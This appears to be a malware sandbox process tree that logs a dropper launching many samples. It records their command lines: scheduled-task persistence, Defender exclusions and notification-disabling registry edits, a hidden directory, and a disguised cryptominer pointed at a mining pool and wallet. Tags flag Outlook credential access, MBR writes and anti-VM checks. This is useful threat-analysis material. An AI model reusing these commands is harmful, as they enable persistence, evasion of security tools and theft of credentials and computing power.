      Suspicious use of AdjustPrivilegeToken
      PID:5148
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
      4⤵
      PID:1268
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2580
- - C:\Users\Admin\Desktop\Files\Client-built.exe
    "C:\Users\Admin\Desktop\Files\Client-built.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5316
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      PID:5444
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2408
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        
        PID:5676
- - C:\Users\Admin\Desktop\Files\crypted.exe
    "C:\Users\Admin\Desktop\Files\crypted.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5180
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:916
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4612
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3732
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3640
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:3572
- - C:\Users\Admin\Desktop\Files\svcyr.exe
    "C:\Users\Admin\Desktop\Files\svcyr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4680
- - C:\Users\Admin\Desktop\Files\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\Files\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:4540
- - C:\Users\Admin\Desktop\Files\cayV0Deo9jSt417.exe
    "C:\Users\Admin\Desktop\Files\cayV0Deo9jSt417.exe"
    3⤵
    PID:6428
  - - C:\Windows\SysWOW64\clip.exe
      "C:\Windows\SysWOW64\clip.exe"
      4⤵
      PID:7992
    - - C:\Users\Admin\AppData\Roaming\System32\taskhost.exe
        
        "C:\Users\Admin\AppData\Roaming\System32\taskhost.exe"
        5⤵
        
        PID:5188
- - C:\Users\Admin\Desktop\Files\ghjkl.exe
    "C:\Users\Admin\Desktop\Files\ghjkl.exe"
    3⤵
    PID:6352
  - - C:\Users\Admin\Desktop\Files\ghjkl.exe
      "C:\Users\Admin\Desktop\Files\ghjkl.exe"
      4⤵
      PID:3912
- - C:\Users\Admin\Desktop\Files\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\Files\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:2648
- - C:\Users\Admin\Desktop\Files\PCclear_Eng_mini.exe
    "C:\Users\Admin\Desktop\Files\PCclear_Eng_mini.exe"
    3⤵
    PID:8964
- - C:\Users\Admin\Desktop\Files\loader.exe
    "C:\Users\Admin\Desktop\Files\loader.exe"
    3⤵
    PID:756
  - - C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe
      "C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"
      4⤵
      PID:4528
    - - C:\Users\Admin\AppData\Local\Temp\ARA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ARA.exe"
        5⤵
        
        PID:9208
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\aUs3pwix5Vd1U6IYzTsfZ9E8dEV3MF.vbe"
        6⤵
        
        PID:6232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\WJgXY0RCE6WdWGoPyLk7f.bat" "
        7⤵
        
        PID:3348
        
        C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe
        
        "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"
        8⤵
        
        PID:5992
        
        C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe
        
        "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"
        9⤵
        
        PID:7564
        
        C:\Users\Admin\Links\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]
        
        "C:\Users\Admin\Links\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]"
        10⤵
        
        PID:5304
- - C:\Users\Admin\Desktop\Files\rtx.exe
    "C:\Users\Admin\Desktop\Files\rtx.exe"
    3⤵
    PID:8256
  - - C:\Users\Admin\Desktop\Files\rtx.exe
      "C:\Users\Admin\Desktop\Files\rtx.exe"
      4⤵
      PID:8928
- - C:\Users\Admin\Desktop\Files\NBYS%20ASM.NET.exe
    "C:\Users\Admin\Desktop\Files\NBYS%20ASM.NET.exe"
    3⤵
    PID:7780
- - C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
    "C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe"
    3⤵
    PID:8064
  - - C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
      "C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe"
      4⤵
      PID:6416
    - - C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        
        C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        5⤵
        
        PID:8620
      - C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        
        C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        6⤵
        
        PID:8408
        
        C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        
        C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        7⤵
        
        PID:1188
        
        C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        
        C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        8⤵
        
        PID:7008
        
        C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        
        C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        9⤵
        
        PID:4224
        
        C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        
        C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
        10⤵
        
        PID:8916
- - C:\Users\Admin\Desktop\Files\ISetup8.exe
    "C:\Users\Admin\Desktop\Files\ISetup8.exe"
    3⤵
    PID:6908
- - C:\Users\Admin\Desktop\Files\ma.exe
    "C:\Users\Admin\Desktop\Files\ma.exe"
    3⤵
    PID:3564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3A09.tmp.bat""
      4⤵
      PID:6804
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2840
    - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:1828
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        
        PID:7784
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:8544
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        6⤵
        
        PID:6164
- - C:\Users\Admin\Desktop\Files\SvCpJuhbT.exe
    "C:\Users\Admin\Desktop\Files\SvCpJuhbT.exe"
    3⤵
    PID:7464
- - C:\Users\Admin\Desktop\Files\ghjk.exe
    "C:\Users\Admin\Desktop\Files\ghjk.exe"
    3⤵
    PID:1924
- - C:\Users\Admin\Desktop\Files\1668093182.exe
    "C:\Users\Admin\Desktop\Files\1668093182.exe"
    3⤵
    PID:4092
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap20348:110:7zEvent16590
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1776
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Users\Admin\Desktop\a\current.exe
    "C:\Users\Admin\Desktop\a\current.exe"
    3⤵
    - Executes dropped EXE
    PID:408
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 396
      4⤵
      Program crash
      PID:1124
- - C:\Users\Admin\Desktop\a\hjv.exe
    "C:\Users\Admin\Desktop\a\hjv.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5992
  - - C:\Users\Admin\Desktop\a\hjv.exe
      "C:\Users\Admin\Desktop\a\hjv.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1784
- - C:\Users\Admin\Desktop\a\HJCL.exe
    "C:\Users\Admin\Desktop\a\HJCL.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2188
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ButRGiQXIZcKdy.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4220
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ButRGiQXIZcKdy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1F6A.tmp"
      4⤵
      Creates scheduled task(s)
      PID:4820
  - - C:\Users\Admin\Desktop\a\HJCL.exe
      "C:\Users\Admin\Desktop\a\HJCL.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      PID:2164
    - - C:\Users\Admin\Desktop\a\HJCL.exe
        
        C:\Users\Admin\Desktop\a\HJCL.exe /stext "C:\Users\Admin\AppData\Local\Temp\cnawxsh"
        5⤵
        Executes dropped EXE
        
        PID:5744
    - - C:\Users\Admin\Desktop\a\HJCL.exe
        
        C:\Users\Admin\Desktop\a\HJCL.exe /stext "C:\Users\Admin\AppData\Local\Temp\cnawxsh"
        5⤵
        Executes dropped EXE
        
        PID:3944
    - - C:\Users\Admin\Desktop\a\HJCL.exe
        
        C:\Users\Admin\Desktop\a\HJCL.exe /stext "C:\Users\Admin\AppData\Local\Temp\cnawxsh"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3396
    - - C:\Users\Admin\Desktop\a\HJCL.exe
        
        C:\Users\Admin\Desktop\a\HJCL.exe /stext "C:\Users\Admin\AppData\Local\Temp\mpgoylrmjv"
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook accounts
        
        PID:5232
    - - C:\Users\Admin\Desktop\a\HJCL.exe
        
        C:\Users\Admin\Desktop\a\HJCL.exe /stext "C:\Users\Admin\AppData\Local\Temp\xklzzdcgxdczg"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3680
- - C:\Users\Admin\Desktop\a\host_so.exe
    "C:\Users\Admin\Desktop\a\host_so.exe"
    3⤵
    - Executes dropped EXE
    PID:5652
- - C:\Users\Admin\Desktop\a\immortal_genius_20240411075733898.exe
    "C:\Users\Admin\Desktop\a\immortal_genius_20240411075733898.exe"
    3⤵
    - Executes dropped EXE
    PID:6048
- C:\Users\Admin\Desktop\a\hjv.exe
  "C:\Users\Admin\Desktop\a\hjv.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5188
- - C:\Users\Admin\Desktop\a\hjv.exe
    "C:\Users\Admin\Desktop\a\hjv.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4308
- C:\Users\Admin\Desktop\a\HJCL.exe
  "C:\Users\Admin\Desktop\a\HJCL.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5212
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ButRGiQXIZcKdy.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5196
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ButRGiQXIZcKdy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5E48.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:4048
- - C:\Users\Admin\Desktop\a\HJCL.exe
    "C:\Users\Admin\Desktop\a\HJCL.exe"
    3⤵
    - Executes dropped EXE
    PID:2564
- C:\Users\Admin\Desktop\a\current.exe
  "C:\Users\Admin\Desktop\a\current.exe"
  2⤵
  - Executes dropped EXE
  PID:5308
- - C:\Windows\SysWOW64\EhStorAuthn.exe
    "C:\Windows\SysWOW64\EhStorAuthn.exe"
    3⤵
    PID:3572
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:4820
- C:\Users\Admin\Desktop\a\host_so.exe
  "C:\Users\Admin\Desktop\a\host_so.exe"
  2⤵
  - Executes dropped EXE
  PID:960
- C:\Users\Admin\Desktop\a\host_so.exe
  "C:\Users\Admin\Desktop\a\host_so.exe"
  2⤵
  - Executes dropped EXE
  PID:5016
- - C:\Windows\SysWOW64\openfiles.exe
    "C:\Windows\SysWOW64\openfiles.exe"
    3⤵
    PID:6200
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:4580
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4944
- - C:\Users\Admin\Desktop\a\html.exe
    "C:\Users\Admin\Desktop\a\html.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1832
  - - C:\Users\Admin\Desktop\a\html.exe
      "C:\Users\Admin\Desktop\a\html.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:5660
- - C:\Users\Admin\Desktop\a\lomik.exe
    "C:\Users\Admin\Desktop\a\lomik.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    - outlook_office_path
    - outlook_win_path
    PID:4348
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:904
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:5828
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:440
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:2564
  - - C:\Users\Admin\AppData\Local\Temp\spanFpPNRUQA5cch\VNSeRtG2pRnniLB_eQlq.exe
      "C:\Users\Admin\AppData\Local\Temp\spanFpPNRUQA5cch\VNSeRtG2pRnniLB_eQlq.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Checks whether UAC is enabled
      Drops file in Windows directory
      PID:4412
    - - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:2684
- - C:\Users\Admin\Desktop\a\eee01.exe
    "C:\Users\Admin\Desktop\a\eee01.exe"
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    PID:2268
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 644
      4⤵
      Program crash
      PID:3532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 640
      4⤵
      Program crash
      PID:5948
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 680
      4⤵
      Program crash
      PID:6648
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 648
      4⤵
      Program crash
      PID:8104
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 700
      4⤵
      Program crash
      PID:9204
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 644
      4⤵
      Program crash
      PID:3632
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 780
      4⤵
      Program crash
      PID:8228
- - C:\Users\Admin\Desktop\a\update.exe
    "C:\Users\Admin\Desktop\a\update.exe"
    3⤵
    - Executes dropped EXE
    PID:4312
- - C:\Users\Admin\Desktop\a\AnyDesk.exe
    "C:\Users\Admin\Desktop\a\AnyDesk.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:5732
  - - C:\Users\Admin\Desktop\a\AnyDesk.exe
      "C:\Users\Admin\Desktop\a\AnyDesk.exe" --local-service
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      PID:4328
  - - C:\Users\Admin\Desktop\a\AnyDesk.exe
      "C:\Users\Admin\Desktop\a\AnyDesk.exe" --local-control
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      PID:1640
- - C:\Users\Admin\Desktop\a\060.exe
    "C:\Users\Admin\Desktop\a\060.exe"
    3⤵
    - Executes dropped EXE
    PID:4628
  - - C:\Users\Admin\AppData\Local\Temp\is-M3GUD.tmp\060.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-M3GUD.tmp\060.tmp" /SL5="$703D2,4318828,54272,C:\Users\Admin\Desktop\a\060.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4460
    - - C:\Users\Admin\AppData\Local\MP3 Cutter Joiner Free\mp3cutterjoinerfree.exe
        
        "C:\Users\Admin\AppData\Local\MP3 Cutter Joiner Free\mp3cutterjoinerfree.exe" -i
        5⤵
        Executes dropped EXE
        
        PID:3388
    - - C:\Users\Admin\AppData\Local\MP3 Cutter Joiner Free\mp3cutterjoinerfree.exe
        
        "C:\Users\Admin\AppData\Local\MP3 Cutter Joiner Free\mp3cutterjoinerfree.exe" -s
        5⤵
        Executes dropped EXE
        
        PID:1468
- - C:\Users\Admin\Desktop\a\cryptography_module_windows.exe
    "C:\Users\Admin\Desktop\a\cryptography_module_windows.exe"
    3⤵
    - Executes dropped EXE
    PID:3820
  - - C:\Users\Admin\Desktop\a\cryptography_module_windows.exe
      "C:\Users\Admin\Desktop\a\cryptography_module_windows.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2872
- - C:\Users\Admin\Desktop\a\ngrok.exe
    "C:\Users\Admin\Desktop\a\ngrok.exe"
    3⤵
    PID:3956
- - C:\Users\Admin\Desktop\a\Discord.exe
    "C:\Users\Admin\Desktop\a\Discord.exe"
    3⤵
    PID:1128
- - C:\Users\Admin\Desktop\a\artifact.exe
    "C:\Users\Admin\Desktop\a\artifact.exe"
    3⤵
    PID:1824
- - C:\Users\Admin\Desktop\a\ProjectE_5.exe
    "C:\Users\Admin\Desktop\a\ProjectE_5.exe"
    3⤵
    PID:4248
- - C:\Users\Admin\Desktop\a\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\a\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:1268
- - C:\Users\Admin\Desktop\a\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\a\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:9160
- - C:\Users\Admin\Desktop\a\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\a\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:3388
- - C:\Users\Admin\Desktop\a\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\a\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:8688
- - C:\Users\Admin\Desktop\a\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\a\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:7296
- - C:\Users\Admin\Desktop\a\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\a\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:7736
- - C:\Users\Admin\Desktop\a\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\a\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:8184
- - C:\Users\Admin\Desktop\a\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\a\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:6968
- - C:\Users\Admin\Desktop\a\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\a\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:9068
- - C:\Users\Admin\Desktop\a\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\a\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:1756
- - C:\Users\Admin\Desktop\a\PH32.exe
    "C:\Users\Admin\Desktop\a\PH32.exe"
    3⤵
    PID:7312
- - C:\Users\Admin\Desktop\a\dControl.exe
    "C:\Users\Admin\Desktop\a\dControl.exe"
    3⤵
    PID:2628
  - - C:\Users\Admin\Desktop\a\dControl.exe
      C:\Users\Admin\Desktop\a\dControl.exe
      4⤵
      PID:7916
    - - C:\Users\Admin\Desktop\a\dControl.exe
        
        "C:\Users\Admin\Desktop\a\dControl.exe" /TI
        5⤵
        
        PID:4444
- - C:\Users\Admin\Desktop\a\VmManagedSetup.exe
    "C:\Users\Admin\Desktop\a\VmManagedSetup.exe"
    3⤵
    PID:6476
- - C:\Users\Admin\Desktop\a\PCHunter64_pps.exe
    "C:\Users\Admin\Desktop\a\PCHunter64_pps.exe"
    3⤵
    PID:7664
- - C:\Users\Admin\Desktop\a\PCHunter64_new.exe
    "C:\Users\Admin\Desktop\a\PCHunter64_new.exe"
    3⤵
    PID:8880
- - C:\Users\Admin\Desktop\a\140.exe
    "C:\Users\Admin\Desktop\a\140.exe"
    3⤵
    PID:7868
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3704
- - C:\Users\Admin\Desktop\a\crazyCore.exe
    "C:\Users\Admin\Desktop\a\crazyCore.exe"
    3⤵
    PID:1704
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c rmdir /s /q \\.\C:\ProgramData\Nul & reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64 & reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f /reg:64 & mkdir \\.\C:\ProgramData\Nul & attrib +r +h +s \\.\C:\ProgramData\Nul & powershell -Command Add-MpPreference -ExclusionPath @('C:\ProgramData', 'C:\Users\Admin\Desktop\a')
      4⤵
      PID:7596
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64
        5⤵
        
        PID:7984
